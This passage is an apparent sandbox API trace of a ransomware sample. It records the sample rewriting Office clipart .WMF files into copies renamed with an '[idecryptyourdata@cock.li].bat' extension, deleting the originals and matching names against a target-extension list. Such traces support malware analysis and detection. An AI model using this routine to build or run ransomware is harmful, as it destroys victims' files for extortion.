Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.488] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.488] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.488] GetLastError () returned 0x0 [0062.488] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x9bc, lpOverlapped=0x0) returned 1 [0062.503] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x9c0, lpOverlapped=0x0) returned 1 [0062.504] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.504] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.504] SetEndOfFile (hFile=0x354) returned 1 [0062.504] CloseHandle (hObject=0x354) returned 1 [0062.505] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.505] SetEndOfFile (hFile=0x344) returned 1 [0062.506] CloseHandle (hObject=0x344) returned 1 [0062.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.506] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0062.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.507] lstrlenW (lpString=".doc") returned 4 [0062.507] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.507] lstrlenW (lpString=".docx") returned 5 [0062.507] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.507] lstrlenW (lpString=".pdf") returned 4 [0062.507] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.507] lstrlenW (lpString=".xls") returned 4 [0062.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.507] lstrlenW (lpString=".xlsx") returned 5 [0062.507] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.507] lstrlenW (lpString=".ppt") returned 4 [0062.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.507] lstrlenW (lpString=".zip") returned 4 [0062.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.507] lstrlenW (lpString=".rar") returned 4 [0062.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.507] lstrlenW (lpString=".bz2") returned 4 [0062.507] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.507] lstrlenW (lpString=".7z") returned 3 [0062.507] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.507] lstrlenW (lpString=".dbf") returned 4 [0062.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.507] lstrlenW (lpString=".1cd") returned 4 [0062.508] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.508] lstrlenW (lpString=".jpg") returned 4 [0062.508] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.508] lstrlenW (lpString=".doc") returned 4 [0062.508] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString=".docx") returned 5 [0062.508] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.508] lstrlenW (lpString=".pdf") returned 4 [0062.508] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString=".xls") returned 4 [0062.508] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.508] lstrlenW (lpString=".xlsx") returned 5 [0062.508] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.508] lstrlenW (lpString=".ppt") returned 4 [0062.508] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.508] lstrlenW (lpString=".zip") returned 4 [0062.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.508] lstrlenW (lpString=".rar") returned 4 [0062.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString=".bz2") returned 4 [0062.508] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString=".7z") returned 3 [0062.508] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.508] lstrlenW (lpString=".dbf") returned 4 [0062.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.509] lstrlenW (lpString=".1cd") returned 4 [0062.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0062.509] lstrlenW (lpString=".jpg") returned 4 [0062.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.509] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.509] lstrlenW (lpString="AN04355_.WMF") returned 12 [0062.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.509] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3228) returned 1 [0062.509] CloseHandle (hObject=0x344) returned 1 [0062.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf")) returned 0x220 [0062.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.509] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.510] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.510] GetLastError () returned 0x0 [0062.510] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xc9c, lpOverlapped=0x0) returned 1 [0062.522] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xca0, lpOverlapped=0x0) returned 1 [0062.523] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.523] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.523] SetEndOfFile (hFile=0x354) returned 1 [0062.525] CloseHandle (hObject=0x354) returned 1 [0062.527] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.528] SetEndOfFile (hFile=0x344) returned 1 [0062.529] CloseHandle (hObject=0x344) returned 1 [0062.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0062.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.531] lstrlenW (lpString=".doc") returned 4 [0062.531] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString=".docx") returned 5 [0062.531] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.531] lstrlenW (lpString=".pdf") returned 4 [0062.531] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString=".xls") returned 4 [0062.531] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.531] lstrlenW (lpString=".xlsx") returned 5 [0062.531] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.531] lstrlenW (lpString=".ppt") returned 4 [0062.531] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.531] lstrlenW (lpString=".zip") returned 4 [0062.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.531] lstrlenW (lpString=".rar") returned 4 [0062.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString=".bz2") returned 4 [0062.531] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString=".7z") returned 3 [0062.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.531] lstrlenW (lpString=".dbf") returned 4 [0062.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.531] lstrlenW (lpString=".1cd") returned 4 [0062.531] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.531] lstrlenW (lpString=".jpg") returned 4 [0062.532] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.532] lstrlenW (lpString=".doc") returned 4 [0062.532] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString=".docx") returned 5 [0062.532] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.532] lstrlenW (lpString=".pdf") returned 4 [0062.532] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString=".xls") returned 4 [0062.532] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.532] lstrlenW (lpString=".xlsx") returned 5 [0062.532] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.532] lstrlenW (lpString=".ppt") returned 4 [0062.532] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.532] lstrlenW (lpString=".zip") returned 4 [0062.532] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.532] lstrlenW (lpString=".rar") returned 4 [0062.532] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString=".bz2") returned 4 [0062.532] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString=".7z") returned 3 [0062.532] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.532] lstrlenW (lpString=".dbf") returned 4 [0062.532] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.532] lstrlenW (lpString=".1cd") returned 4 [0062.532] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 68 [0062.533] lstrlenW (lpString=".jpg") returned 4 [0062.533] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.533] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.533] lstrlenW (lpString="AN04385_.WMF") returned 12 [0062.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.533] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=5004) returned 1 [0062.533] CloseHandle (hObject=0x2c8) returned 1 [0062.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf")) returned 0x220 [0062.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.533] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.533] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.534] GetLastError () returned 0x0 [0062.534] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x138c, lpOverlapped=0x0) returned 1 [0062.555] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1390, lpOverlapped=0x0) returned 1 [0062.556] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.556] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.556] SetEndOfFile (hFile=0x370) returned 1 [0062.557] CloseHandle (hObject=0x370) returned 1 [0062.557] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.557] SetEndOfFile (hFile=0x2c8) returned 1 [0062.558] CloseHandle (hObject=0x2c8) returned 1 [0062.558] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0062.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.560] lstrlenW (lpString=".doc") returned 4 [0062.560] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.560] lstrlenW (lpString=".docx") returned 5 [0062.560] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.560] lstrlenW (lpString=".pdf") returned 4 [0062.560] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.560] lstrlenW (lpString=".xls") returned 4 [0062.560] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.560] lstrlenW (lpString=".xlsx") returned 5 [0062.560] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.561] lstrlenW (lpString=".ppt") returned 4 [0062.561] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString=".zip") returned 4 [0062.561] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.561] lstrlenW (lpString=".rar") returned 4 [0062.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString=".bz2") returned 4 [0062.561] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString=".7z") returned 3 [0062.561] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString=".dbf") returned 4 [0062.561] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString=".1cd") returned 4 [0062.561] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString=".jpg") returned 4 [0062.561] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString=".doc") returned 4 [0062.561] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString=".docx") returned 5 [0062.561] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.561] lstrlenW (lpString=".pdf") returned 4 [0062.561] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString=".xls") returned 4 [0062.561] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.561] lstrlenW (lpString=".xlsx") returned 5 [0062.561] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.561] lstrlenW (lpString=".ppt") returned 4 [0062.561] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.561] lstrlenW (lpString=".zip") returned 4 [0062.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.562] lstrlenW (lpString=".rar") returned 4 [0062.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.562] lstrlenW (lpString=".bz2") returned 4 [0062.562] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.562] lstrlenW (lpString=".7z") returned 3 [0062.562] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.562] lstrlenW (lpString=".dbf") returned 4 [0062.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.562] lstrlenW (lpString=".1cd") returned 4 [0062.562] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0062.562] lstrlenW (lpString=".jpg") returned 4 [0062.562] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.562] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.562] lstrlenW (lpString="BD00141_.WMF") returned 12 [0062.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.562] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=26886) returned 1 [0062.563] CloseHandle (hObject=0x2c8) returned 1 [0062.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf")) returned 0x220 [0062.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.563] SetFilePointerEx 